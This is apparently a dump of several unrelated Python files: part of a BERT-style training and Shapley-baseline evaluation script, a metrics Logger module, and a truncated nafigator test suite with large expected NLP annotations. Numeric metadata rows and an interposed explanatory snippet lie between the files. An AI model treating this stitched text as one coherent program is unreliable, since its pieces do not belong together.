                    train_output_dir = 'temp/' + train_task_name + '_output_baseline_' + str(
                        best_per_gpu_train_batch_size) + '_' + str(best_learning_rate)  # +str(seed)+'/'
                eval_output_dir = train_output_dir + '/best/'
                run_command = "CUDA_VISIBLE_DEVICES=" + str(CUDA_VISIBLE_DEVICES[0])
                for i in CUDA_VISIBLE_DEVICES[1:]:
                    run_command += ',' + str(i)
                run_command += ' python '
                if len(CUDA_VISIBLE_DEVICES) > 1: run_command += '-m torch.distributed.launch --nproc_per_node ' \
                    + str(len(CUDA_VISIBLE_DEVICES))
                run_command += ' ' + run_file + ' ' + ' --model_type ' + model_type + \
                    ' --max_seq_length ' + str(max_seq_length) + ' --per_gpu_eval_batch_size=' + str(
                    per_gpu_eval_batch_size) + \
                    ' --per_gpu_train_batch_size=' + str(
                    best_per_gpu_train_batch_size) + ' --learning_rate ' + str(
                    best_learning_rate) \
                    + ' --overwrite_output_dir '
                if do_lower_case: run_command += '--do_lower_case '
                if fp16: run_command += ' --fp16 '
                if overwrite_cache:
                    run_command += ' --overwrite_cache '
                if evaluate_during_training: run_command += ' --evaluate_during_training '
                train_run_command = run_command + ' --do_train --task_name ' + train_task_name + \
                    ' --data_dir ' + train_data_dir + ' --output_dir ' + \
                    train_output_dir + ' --model_name_or_path ' + train_model_name_or_path
                # For eval:
                run_command = "CUDA_VISIBLE_DEVICES=" + str(CUDA_VISIBLE_DEVICES[0])
                run_command += ' python '
                run_command += ' ' + run_file + ' ' + ' --model_type ' + model_type + \
                    ' --max_seq_length ' + str(max_seq_length) + ' --per_gpu_eval_batch_size=' + str(
                    per_gpu_eval_batch_size) + \
                    ' --per_gpu_train_batch_size=' + str(
                    best_per_gpu_train_batch_size) + ' --learning_rate ' + str(
                    best_learning_rate) \
                    + ' --overwrite_output_dir '
                if do_lower_case: run_command += '--do_lower_case '
                if fp16: run_command += ' --fp16 '
                if overwrite_cache:
                    run_command += ' --overwrite_cache '
                eval_run_command = run_command + ' --do_predict --task_name ' + eval_task_name + \
                    ' --data_dir ' + eval_data_dir + ' --output_dir ' + eval_output_dir + \
                    ' --model_name_or_path ' + eval_output_dir
                indices_to_delete_file_path = eval_output_dir + '/indices_to_delete_file_path' + '.json'
                if is_Shapley: train_run_command += ' --indices_to_delete_file_path ' + indices_to_delete_file_path
                command = train_run_command + ' --num_train_epochs ' + str(num_train_epochs)
                print(command, flush=True)
                os.system(command)
                # initial Eval on whole dataset
                command = eval_run_command
                print(command, flush=True)
                os.system(command)
                output_eval_file = os.path.join(eval_output_dir, "eval_results.txt")
                with open(output_eval_file, "r") as reader:
                    for line in reader:
                        line = line.strip().split()
                        key = line[0]
                        value = line[-1]
                        if key in ['acc']:
                            acc = float(value)
                print('-' * 100, flush=True)
                print("Task: ", train_task_name, flush=True)
                print("best_learning_rate: ", best_learning_rate, flush=True)
                print("best_per_gpu_train_batch_size: ", best_per_gpu_train_batch_size, flush=True)
                print("BEST TEST Acc: ", acc, flush=True)
                print("Shapley: ", str(is_Shapley), flush=True)
                print('-' * 100, flush=True)
                if is_Shapley == True:
                    best_shapley_learning_rate = best_learning_rate
                    best_shapley_per_gpu_train_batch_size = best_per_gpu_train_batch_size
                    BEST_SHAPLEY_ACC = acc
                elif is_Shapley == BASELINES_S:
                    best_baseline_s_learning_rate = best_learning_rate
                    best_baseline_s_per_gpu_train_batch_size = best_per_gpu_train_batch_size
                else:
                    best_baseline_learning_rate = best_learning_rate
                    best_baseline_per_gpu_train_batch_size = best_per_gpu_train_batch_size
                    BEST_BASELINE_ACC = acc
            best_shapley_dir = 'temp/' + eval_task_name + '_output_Shapley_' + str(best_shapley_per_gpu_train_batch_size) + '_' + \
                str(best_shapley_learning_rate) + '/best/'
            gold = best_shapley_dir + 'test_gold.txt'
            shapley = best_shapley_dir + 'test_predictions.txt'
            baseline = 'temp/' + eval_task_name + '_output_baseline_' + str(best_baseline_per_gpu_train_batch_size) + '_' + \
                str(best_baseline_learning_rate) + '/best/' + 'test_predictions.txt'
            baseline_s = 'temp/' + eval_task_name + '_output_baseline-s_' + str(best_baseline_s_per_gpu_train_batch_size) + '_' + \
                str(best_baseline_s_learning_rate) + '/best/' + 'test_predictions.txt'
            print('-' * 100, flush=True)
            print('Bootstrap paired test of Shapley with baseline!', flush=True)
            command = "python script_t_test.py " + gold + ' ' + shapley + ' ' + baseline
            print(command, flush=True)
            print('-' * 50, flush=True)
            os.system(command)
            print('-' * 50, flush=True)
            print('-' * 50, flush=True)
            print('Bootstrap paired test of Shapley with baseline-s!', flush=True)
            command = "python script_t_test.py " + gold + ' ' + shapley + ' ' + baseline_s
            print(command, flush=True)
            print('-' * 50, flush=True)
            os.system(command)
            print('-' * 100, flush=True)
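The `eval_results.txt` parsing appears twice in the script above; the same key/value scan can be isolated into one helper. The file format is assumed, as the loops above imply, to be whitespace-separated lines whose first field is the metric name and last field its value:

```python
import os
import tempfile

def read_acc(output_eval_file, default=0):
    # Scan whitespace-separated lines and keep the last field of the 'acc' line
    try:
        with open(output_eval_file, "r") as reader:
            for line in reader:
                parts = line.strip().split()
                if parts and parts[0] == "acc":
                    return float(parts[-1])
    except OSError:
        pass
    return default

# Demonstrate on a synthetic results file
path = os.path.join(tempfile.mkdtemp(), "eval_results.txt")
with open(path, "w") as f:
    f.write("loss = 0.31\nacc = 0.954\n")
print(read_acc(path))  # 0.954
```

Like the `try/except` in the tuning loop, a missing or malformed file falls back to `default`.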
| 45.49697 | 178 | 0.519471 | 2,398 | 22,521 | 4.207673 | 0.106756 | 0.042815 | 0.041427 | 0.060258 | 0.769772 | 0.708424 | 0.649752 | 0.614172 | 0.575421 | 0.548365 | 0 | 0.027724 | 0.380179 | 22,521 | 494 | 179 | 45.589069 | 0.695107 | 0.058967 | 0 | 0.534759 | 0 | 0 | 0.165035 | 0.040148 | 0.010695 | 0 | 0 | 0 | 0 | 1 | 0.002674 | false | 0 | 0.02139 | 0 | 0.024064 | 0.096257 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcd5f55bb1f89d31cd3d25738bba5c23139e9aa7 | 1,978 | py | Python | Logger/Logger.py | ArthMx/Logger | 0fab4009abec00f33d9b93d0c6093e544e5168b8 | [
"MIT"
] | null | null | null | Logger/Logger.py | ArthMx/Logger | 0fab4009abec00f33d9b93d0c6093e544e5168b8 | [
"MIT"
] | null | null | null | Logger/Logger.py | ArthMx/Logger | 0fab4009abec00f33d9b93d0c6093e544e5168b8 | [
"MIT"
] | null | null | null | import pandas as pd
import time
import sys
class AverageMeter(object):
    """Sum values to compute the mean."""

    def __init__(self):
        self.reset()

    def reset(self):
        self.count = 0
        self.sum = 0

    def update(self, val):
        self.count += 1
        self.sum += val

    def average(self):
        return self.sum / self.count


class MetricsLogger(object):
    """Track the values of different metrics, display their average values and save them
    in a log file."""

    def __init__(self):
        self.log_df = pd.DataFrame()
        self.n = 0
        self.reset()

    def reset(self):
        """Reset the metrics average meters."""
        # Save last epoch average value of metrics (unless it's the first epoch)
        if self.n > 0:
            self.log_df = self.log_df.append(self._average(), ignore_index=True)
        self.n += 1
        self.avgmeters = {}
        self.last_update = time.time()

    def update(self, values, show=True):
        """Update metrics values and display their current average if show is True."""
        for key in values:
            if key not in self.avgmeters:
                self.avgmeters[key] = AverageMeter()
            self.avgmeters[key].update(values[key])
        if show:
            self._show()

    def save_log(self, path):
        """Save log dataframe to path."""
        self.log_df.to_csv(path, index=False)

    def _average(self):
        return {key: self.avgmeters[key].average() for key in self.avgmeters}

    def __str__(self):
        avg = self._average()
        str_list = [key + ": %.4f" % round(avg[key], 4) for key in avg]
        return (" - ").join(str_list)

    def _show(self, t_thresh=0.1):
        t_now = time.time()
        if t_now - self.last_update >= t_thresh:
            sys.stdout.write("\r" + str(self))
            sys.stdout.flush()
            self.last_update = t_now
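A short usage sketch of the `AverageMeter` pattern above, with the class reproduced so the example is self-contained and does not depend on pandas:

```python
class AverageMeter(object):
    """Sum values to compute the mean."""
    def __init__(self):
        self.reset()
    def reset(self):
        self.count = 0
        self.sum = 0
    def update(self, val):
        self.count += 1
        self.sum += val
    def average(self):
        return self.sum / self.count

# Accumulate per-batch losses during one epoch, then read the epoch mean
meter = AverageMeter()
for loss in (1.0, 2.0, 3.0):
    meter.update(loss)
print(meter.average())  # 2.0
```

`MetricsLogger.reset()` plays the same role per epoch: it archives the averages and starts fresh meters.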
| 29.969697 | 88 | 0.557634 | 258 | 1,978 | 4.143411 | 0.310078 | 0.072965 | 0.033676 | 0.028064 | 0.039289 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007513 | 0.327098 | 1,978 | 65 | 89 | 30.430769 | 0.795642 | 0.169363 | 0 | 0.130435 | 0 | 0 | 0.00682 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.23913 | false | 0 | 0.065217 | 0.043478 | 0.413043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcdad0563564da691ff6918e2c18e8483c8a38b4 | 69,814 | py | Python | tests/test_nafigator.py | DeNederlandscheBank/nafigator | 02f8bf4e0962430429cc2c4fdfc79d2d90a16363 | [
"MIT"
] | 1 | 2022-01-17T14:41:25.000Z | 2022-01-17T14:41:25.000Z | tests/test_nafigator.py | DeNederlandscheBank/nafigator | 02f8bf4e0962430429cc2c4fdfc79d2d90a16363 | [
"MIT"
] | 3 | 2021-11-03T14:53:25.000Z | 2022-02-22T13:21:13.000Z | tests/test_nafigator.py | DeNederlandscheBank/nafigator | 02f8bf4e0962430429cc2c4fdfc79d2d90a16363 | [
"MIT"
] | 1 | 2021-11-17T10:48:19.000Z | 2021-11-17T10:48:19.000Z | #!/usr/bin/env python
"""Tests for `nafigator` package."""
import unittest
unittest.TestLoader.sortTestMethodsUsing = None
from deepdiff import DeepDiff
from click.testing import CliRunner
from nafigator import NafDocument, parse2naf
from os.path import join
class TestNafigator_pdf(unittest.TestCase):
    """Tests for `nafigator` package."""

    def test_1_pdf_generate_naf(self):
        """ """
        tree = parse2naf.generate_naf(
            input=join("tests", "tests", "example.pdf"),
            engine="stanza",
            language="en",
            naf_version="v3.1",
            dtd_validation=False,
            params={},
            nlp=None,
        )
        assert tree.write(join("tests", "tests", "example.naf.xml")) == None

    def test_1_split_pre_linguistic(self):
        """ """
        # only save the preprocess steps
        tree = parse2naf.generate_naf(
            input=join("tests", "tests", "example.pdf"),
            engine="stanza",
            language="en",
            naf_version="v3.1",
            dtd_validation=False,
            params={'linguistic_layers': []},
            nlp=None,
        )
        tree.write(join("tests", "tests", "example_preprocess.naf.xml")) == None
        # start with saved document and process linguistic steps
        naf = NafDocument().open(join("tests", "tests", "example_preprocess.naf.xml"))
        tree = parse2naf.generate_naf(
            input=naf,
            engine="stanza",
            language="en",
            naf_version="v3.1",
            params={'preprocess_layers': []}
        )
        doc = NafDocument().open(join("tests", "tests", "example.naf.xml"))
        assert tree.raw == doc.raw

    def test_2_pdf_header_filedesc(self):
        """ """
        naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
        actual = naf.header["fileDesc"]
        expected = {
            "filename": "tests\\tests\\example.pdf",
            "filetype": "application/pdf",
        }
        assert actual["filename"] == expected["filename"]
        assert actual["filetype"] == expected["filetype"]

    def test_3_pdf_header_public(self):
        """ """
        naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
        actual = naf.header["public"]
        expected = {
            "{http://purl.org/dc/elements/1.1/}uri": "tests\\tests\\example.pdf",
            "{http://purl.org/dc/elements/1.1/}format": "application/pdf",
        }
        assert actual == expected, (
            "expected: " + str(expected) + ", actual: " + str(actual)
        )

    # def test_4_pdf_header_linguistic_processors(self):
    #     naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
    #     actual = naf.header['linguisticProcessors']
    #     expected = [{'layer': 'pdftoxml', 'lps':
    #                  [{'name': 'pdfminer-pdf2xml',
    #                    'version': 'pdfminer_version-20200124',
    #                    'beginTimestamp': '2021-05-05T13:25:16UTC',
    #                    'endTimestamp': '2021-05-05T13:25:16UTC'}]},
    #                 {'layer': 'pdftotext', 'lps':
    #                  [{'name': 'pdfminer-pdf2text',
    #                    'version': 'pdfminer_version-20200124',
    #                    'beginTimestamp': '2021-05-05T13:25:16UTC',
    #                    'endTimestamp': '2021-05-05T13:25:16UTC'}]},
    #                 {'layer': 'formats', 'lps':
    #                  [{'name': 'stanza-model_en',
    #                    'version': 'stanza_version-1.2',
    #                    'beginTimestamp': '2021-05-05T13:25:18UTC',
    #                    'endTimestamp': '2021-05-05T13:25:18UTC'}]},
    #                 {'layer': 'entities', 'lps':
    #                  [{'name': 'stanza-model_en',
    #                    'version': 'stanza_version-1.2',
    #                    'beginTimestamp': '2021-05-05T13:25:18UTC',
    #                    'endTimestamp': '2021-05-05T13:25:18UTC'}]},
    #                 {'layer': 'text', 'lps':
    #                  [{'name': 'stanza-model_en',
    #                    'version': 'stanza_version-1.2',
    #                    'beginTimestamp': '2021-05-05T13:25:18UTC',
    #                    'endTimestamp': '2021-05-05T13:25:18UTC'}]},
    #                 {'layer': 'terms', 'lps':
    #                  [{'name': 'stanza-model_en',
    #                    'version': 'stanza_version-1.2',
    #                    'beginTimestamp': '2021-05-05T13:25:18UTC',
    #                    'endTimestamp': '2021-05-05T13:25:18UTC'}]},
    #                 {'layer': 'deps', 'lps':
    #                  [{'name': 'stanza-model_en',
    #                    'version': 'stanza_version-1.2',
    #                    'beginTimestamp': '2021-05-05T13:25:18UTC',
    #                    'endTimestamp': '2021-05-05T13:25:18UTC'}]},
    #                 {'layer': 'multiwords', 'lps':
    #                  [{'name': 'stanza-model_en',
    #                    'version': 'stanza_version-1.2',
    #                    'beginTimestamp': '2021-05-05T13:25:18UTC',
    #                    'endTimestamp': '2021-05-05T13:25:18UTC'}]},
    #                 {'layer': 'raw', 'lps':
    #                  [{'name': 'stanza-model_en',
    #                    'version': 'stanza_version-1.2',
    #                    'beginTimestamp': '2021-05-05T13:25:18UTC',
    #                    'endTimestamp': '2021-05-05T13:25:18UTC'}]}]
    #     assert actual == expected, "expected: " + str(expected) + ", actual: " + str(actual)

    def test_5_pdf_formats(self):
        naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
        actual = naf.formats
        expected = [
            {
                "length": "268",
                "offset": "0",
                "textboxes": [
                    {
                        "textlines": [
                            {
                                "texts": [
                                    {
                                        "font": "CIDFont+F1",
                                        "size": "12.000",
                                        "length": "87",
                                        "offset": "0",
                                        "text": "The Nafigator package allows you to store NLP output from custom made spaCy and stanza ",
                                    }
                                ]
                            },
                            {
                                "texts": [
                                    {
                                        "font": "CIDFont+F1",
                                        "size": "12.000",
                                        "length": "77",
                                        "offset": "88",
                                        "text": "pipelines with (intermediate) results and all processing steps in one format.",
                                    }
                                ]
                            },
                        ]
                    },
                    {
                        "textlines": [
                            {
                                "texts": [
                                    {
                                        "font": "CIDFont+F1",
                                        "size": "12.000",
                                        "length": "86",
                                        "offset": "167",
                                        "text": "Multiwords like in “we have set that out below” are recognized (depending on your NLP ",
                                    }
                                ]
                            },
                            {
                                "texts": [
                                    {
                                        "font": "CIDFont+F1",
                                        "size": "12.000",
                                        "length": "11",
                                        "offset": "254",
                                        "text": "processor).",
                                    }
                                ]
                            },
                        ]
                    },
                ],
                "figures": [],
                "headers": [],
            }
        ]
        assert actual == expected, (
            "expected: " + str(expected) + ", actual: " + str(actual)
        )

    def test_6_pdf_entities(self):
        naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
        actual = naf.entities
        expected = [
            {
                "id": "e1",
                "type": "PRODUCT",
                "text": "Nafigator",
                "span": [{"id": "t2"}],
            },
            {"id": "e2", "type": "CARDINAL", "text": "one", "span": [{"id": "t28"}]},
        ]
        assert actual == expected, (
            "expected: " + str(expected) + ", actual: " + str(actual)
        )

    def test_7_pdf_text(self):
        naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
        actual = naf.text
        expected = [
            {
                "text": "The",
                "page": "1",
                "para": "1",
                "sent": "1",
                "id": "w1",
                "length": "3",
                "offset": "0",
            },
            {
                "text": "Nafigator",
                "page": "1",
                "para": "1",
                "sent": "1",
                "id": "w2",
                "length": "9",
                "offset": "4",
            },
            {
                "text": "package",
                "page": "1",
                "para": "1",
                "sent": "1",
                "id": "w3",
                "length": "7",
                "offset": "14",
            },
            {
                "text": "allows",
                "page": "1",
                "para": "1",
                "sent": "1",
                "id": "w4",
                "length": "6",
                "offset": "22",
            },
            {
                "text": "you",
                "page": "1",
                "para": "1",
"sent": "1",
"id": "w5",
"length": "3",
"offset": "29",
},
{
"text": "to",
"page": "1",
"para": "1",
"sent": "1",
"id": "w6",
"length": "2",
"offset": "33",
},
{
"text": "store",
"page": "1",
"para": "1",
"sent": "1",
"id": "w7",
"length": "5",
"offset": "36",
},
{
"text": "NLP",
"page": "1",
"para": "1",
"sent": "1",
"id": "w8",
"length": "3",
"offset": "42",
},
{
"text": "output",
"page": "1",
"para": "1",
"sent": "1",
"id": "w9",
"length": "6",
"offset": "46",
},
{
"text": "from",
"page": "1",
"para": "1",
"sent": "1",
"id": "w10",
"length": "4",
"offset": "53",
},
{
"text": "custom",
"page": "1",
"para": "1",
"sent": "1",
"id": "w11",
"length": "6",
"offset": "58",
},
{
"text": "made",
"page": "1",
"para": "1",
"sent": "1",
"id": "w12",
"length": "4",
"offset": "65",
},
{
"text": "spa",
"page": "1",
"para": "1",
"sent": "1",
"id": "w13",
"length": "3",
"offset": "70",
},
{
"text": "Cy",
"page": "1",
"para": "1",
"sent": "2",
"id": "w14",
"length": "2",
"offset": "73",
},
{
"text": "and",
"page": "1",
"para": "1",
"sent": "2",
"id": "w15",
"length": "3",
"offset": "76",
},
{
"text": "stanza",
"page": "1",
"para": "1",
"sent": "2",
"id": "w16",
"length": "6",
"offset": "80",
},
{
"text": "pipelines",
"page": "1",
"para": "1",
"sent": "2",
"id": "w17",
"length": "9",
"offset": "88",
},
{
"text": "with",
"page": "1",
"para": "1",
"sent": "2",
"id": "w18",
"length": "4",
"offset": "98",
},
{
"text": "(",
"page": "1",
"para": "1",
"sent": "2",
"id": "w19",
"length": "1",
"offset": "103",
},
{
"text": "intermediate",
"page": "1",
"para": "1",
"sent": "2",
"id": "w20",
"length": "12",
"offset": "104",
},
{
"text": ")",
"page": "1",
"para": "1",
"sent": "2",
"id": "w21",
"length": "1",
"offset": "116",
},
{
"text": "results",
"page": "1",
"para": "1",
"sent": "2",
"id": "w22",
"length": "7",
"offset": "118",
},
{
"text": "and",
"page": "1",
"para": "1",
"sent": "2",
"id": "w23",
"length": "3",
"offset": "126",
},
{
"text": "all",
"page": "1",
"para": "1",
"sent": "2",
"id": "w24",
"length": "3",
"offset": "130",
},
{
"text": "processing",
"page": "1",
"para": "1",
"sent": "2",
"id": "w25",
"length": "10",
"offset": "134",
},
{
"text": "steps",
"page": "1",
"para": "1",
"sent": "2",
"id": "w26",
"length": "5",
"offset": "145",
},
{
"text": "in",
"page": "1",
"para": "1",
"sent": "2",
"id": "w27",
"length": "2",
"offset": "151",
},
{
"text": "one",
"page": "1",
"para": "1",
"sent": "2",
"id": "w28",
"length": "3",
"offset": "154",
},
{
"text": "format",
"page": "1",
"para": "1",
"sent": "2",
"id": "w29",
"length": "6",
"offset": "158",
},
{
"text": ".",
"page": "1",
"para": "1",
"sent": "2",
"id": "w30",
"length": "1",
"offset": "164",
},
{
"text": "Multiwords",
"page": "1",
"para": "2",
"sent": "3",
"id": "w31",
"length": "10",
"offset": "167",
},
{
"text": "like",
"page": "1",
"para": "2",
"sent": "3",
"id": "w32",
"length": "4",
"offset": "178",
},
{
"text": "in",
"page": "1",
"para": "2",
"sent": "3",
"id": "w33",
"length": "2",
"offset": "183",
},
{
"text": "“",
"page": "1",
"para": "2",
"sent": "3",
"id": "w34",
"length": "1",
"offset": "186",
},
{
"text": "we",
"page": "1",
"para": "2",
"sent": "3",
"id": "w35",
"length": "2",
"offset": "187",
},
{
"text": "have",
"page": "1",
"para": "2",
"sent": "3",
"id": "w36",
"length": "4",
"offset": "190",
},
{
"text": "set",
"page": "1",
"para": "2",
"sent": "3",
"id": "w37",
"length": "3",
"offset": "195",
},
{
"text": "that",
"page": "1",
"para": "2",
"sent": "3",
"id": "w38",
"length": "4",
"offset": "199",
},
{
"text": "out",
"page": "1",
"para": "2",
"sent": "3",
"id": "w39",
"length": "3",
"offset": "204",
},
{
"text": "below",
"page": "1",
"para": "2",
"sent": "3",
"id": "w40",
"length": "5",
"offset": "208",
},
{
"text": "”",
"page": "1",
"para": "2",
"sent": "3",
"id": "w41",
"length": "1",
"offset": "213",
},
{
"text": "are",
"page": "1",
"para": "2",
"sent": "3",
"id": "w42",
"length": "3",
"offset": "215",
},
{
"text": "recognized",
"page": "1",
"para": "2",
"sent": "3",
"id": "w43",
"length": "10",
"offset": "219",
},
{
"text": "(",
"page": "1",
"para": "2",
"sent": "3",
"id": "w44",
"length": "1",
"offset": "230",
},
{
"text": "depending",
"page": "1",
"para": "2",
"sent": "3",
"id": "w45",
"length": "9",
"offset": "231",
},
{
"text": "on",
"page": "1",
"para": "2",
"sent": "3",
"id": "w46",
"length": "2",
"offset": "241",
},
{
"text": "your",
"page": "1",
"para": "2",
"sent": "3",
"id": "w47",
"length": "4",
"offset": "244",
},
{
"text": "NLP",
"page": "1",
"para": "2",
"sent": "3",
"id": "w48",
"length": "3",
"offset": "249",
},
{
"text": "processor",
"page": "1",
"para": "2",
"sent": "3",
"id": "w49",
"length": "9",
"offset": "254",
},
{
"text": ")",
"page": "1",
"para": "2",
"sent": "3",
"id": "w50",
"length": "1",
"offset": "263",
},
{
"text": ".",
"page": "1",
"para": "2",
"sent": "3",
"id": "w51",
"length": "1",
"offset": "264",
},
]
diff = DeepDiff(actual, expected)
assert diff == dict(), diff
def test_8_pdf_terms(self):
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.terms
expected = [
{
"id": "t1",
"lemma": "the",
"pos": "DET",
"type": "open",
"morphofeat": "Definite=Def|PronType=Art",
"span": [{"id": "w1"}],
},
{
"id": "t2",
"lemma": "Nafigator",
"pos": "PROPN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w2"}],
},
{
"id": "t3",
"lemma": "package",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w3"}],
},
{
"id": "t4",
"lemma": "allow",
"pos": "VERB",
"type": "open",
"morphofeat": "Mood=Ind|Number=Sing|Person=3|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w4"}],
},
{
"id": "t5",
"lemma": "you",
"pos": "PRON",
"type": "open",
"morphofeat": "Case=Acc|Person=2|PronType=Prs",
"span": [{"id": "w5"}],
},
{
"id": "t6",
"lemma": "to",
"pos": "PART",
"type": "open",
"span": [{"id": "w6"}],
},
{
"id": "t7",
"lemma": "store",
"pos": "VERB",
"type": "open",
"morphofeat": "VerbForm=Inf",
"span": [{"id": "w7"}],
},
{
"id": "t8",
"lemma": "nlp",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w8"}],
},
{
"id": "t9",
"lemma": "output",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w9"}],
},
{
"id": "t10",
"lemma": "from",
"pos": "ADP",
"type": "open",
"span": [{"id": "w10"}],
},
{
"id": "t11",
"lemma": "custom",
"pos": "ADJ",
"type": "open",
"morphofeat": "Degree=Pos",
"span": [{"id": "w11"}],
},
{
"id": "t12",
"lemma": "make",
"pos": "VERB",
"type": "open",
"morphofeat": "Tense=Past|VerbForm=Part",
"span": [{"id": "w12"}],
},
{
"id": "t13",
"lemma": "spa",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w13"}],
},
{
"id": "t14",
"lemma": "cy",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w14"}],
},
{
"id": "t15",
"lemma": "and",
"pos": "CCONJ",
"type": "open",
"span": [{"id": "w15"}],
},
{
"id": "t16",
"lemma": "stanza",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w16"}],
},
{
"id": "t17",
"lemma": "pipeline",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Plur",
"span": [{"id": "w17"}],
},
{
"id": "t18",
"lemma": "with",
"pos": "ADP",
"type": "open",
"span": [{"id": "w18"}],
},
{
"id": "t19",
"lemma": "(",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w19"}],
},
{
"id": "t20",
"lemma": "intermediate",
"pos": "ADJ",
"type": "open",
"morphofeat": "Degree=Pos",
"span": [{"id": "w20"}],
},
{
"id": "t21",
"lemma": ")",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w21"}],
},
{
"id": "t22",
"lemma": "result",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Plur",
"span": [{"id": "w22"}],
},
{
"id": "t23",
"lemma": "and",
"pos": "CCONJ",
"type": "open",
"span": [{"id": "w23"}],
},
{
"id": "t24",
"lemma": "all",
"pos": "DET",
"type": "open",
"span": [{"id": "w24"}],
},
{
"id": "t25",
"lemma": "processing",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w25"}],
},
{
"id": "t26",
"lemma": "step",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Plur",
"span": [{"id": "w26"}],
},
{
"id": "t27",
"lemma": "in",
"pos": "ADP",
"type": "open",
"span": [{"id": "w27"}],
},
{
"id": "t28",
"lemma": "one",
"pos": "NUM",
"type": "open",
"morphofeat": "NumType=Card",
"span": [{"id": "w28"}],
},
{
"id": "t29",
"lemma": "format",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w29"}],
},
{
"id": "t30",
"lemma": ".",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w30"}],
},
{
"id": "t31",
"lemma": "multiword",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Plur",
"span": [{"id": "w31"}],
},
{
"id": "t32",
"lemma": "like",
"pos": "ADP",
"type": "open",
"span": [{"id": "w32"}],
},
{
"id": "t33",
"lemma": "in",
"pos": "ADP",
"type": "open",
"span": [{"id": "w33"}],
},
{
"id": "t34",
"lemma": '"',
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w34"}],
},
{
"id": "t35",
"lemma": "we",
"pos": "PRON",
"type": "open",
"morphofeat": "Case=Nom|Number=Plur|Person=1|PronType=Prs",
"span": [{"id": "w35"}],
},
{
"id": "t36",
"lemma": "have",
"pos": "AUX",
"type": "open",
"morphofeat": "Mood=Ind|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w36"}],
},
{
"id": "t37",
"lemma": "set",
"pos": "VERB",
"type": "open",
"morphofeat": "Tense=Past|VerbForm=Part",
"component_of": "mw1",
"span": [{"id": "w37"}],
},
{
"id": "t38",
"lemma": "that",
"pos": "SCONJ",
"type": "open",
"span": [{"id": "w38"}],
},
{
"id": "t39",
"lemma": "out",
"pos": "ADP",
"type": "open",
"component_of": "mw1",
"span": [{"id": "w39"}],
},
{
"id": "t40",
"lemma": "below",
"pos": "ADV",
"type": "open",
"span": [{"id": "w40"}],
},
{
"id": "t41",
"lemma": '"',
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w41"}],
},
{
"id": "t42",
"lemma": "be",
"pos": "AUX",
"type": "open",
"morphofeat": "Mood=Ind|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w42"}],
},
{
"id": "t43",
"lemma": "recognize",
"pos": "VERB",
"type": "open",
"morphofeat": "Tense=Past|VerbForm=Part|Voice=Pass",
"span": [{"id": "w43"}],
},
{
"id": "t44",
"lemma": "(",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w44"}],
},
{
"id": "t45",
"lemma": "depend",
"pos": "VERB",
"type": "open",
"morphofeat": "VerbForm=Ger",
"span": [{"id": "w45"}],
},
{
"id": "t46",
"lemma": "on",
"pos": "ADP",
"type": "open",
"span": [{"id": "w46"}],
},
{
"id": "t47",
"lemma": "you",
"pos": "PRON",
"type": "open",
"morphofeat": "Person=2|Poss=Yes|PronType=Prs",
"span": [{"id": "w47"}],
},
{
"id": "t48",
"lemma": "nlp",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w48"}],
},
{
"id": "t49",
"lemma": "processor",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w49"}],
},
{
"id": "t50",
"lemma": ")",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w50"}],
},
{
"id": "t51",
"lemma": ".",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w51"}],
},
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_9_pdf_dependencies(self):
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.deps
expected = [
{"from_term": "t3", "to_term": "t1", "rfunc": "det"},
{"from_term": "t4", "to_term": "t3", "rfunc": "nsubj"},
{"from_term": "t3", "to_term": "t2", "rfunc": "compound"},
{"from_term": "t4", "to_term": "t5", "rfunc": "obj"},
{"from_term": "t7", "to_term": "t6", "rfunc": "mark"},
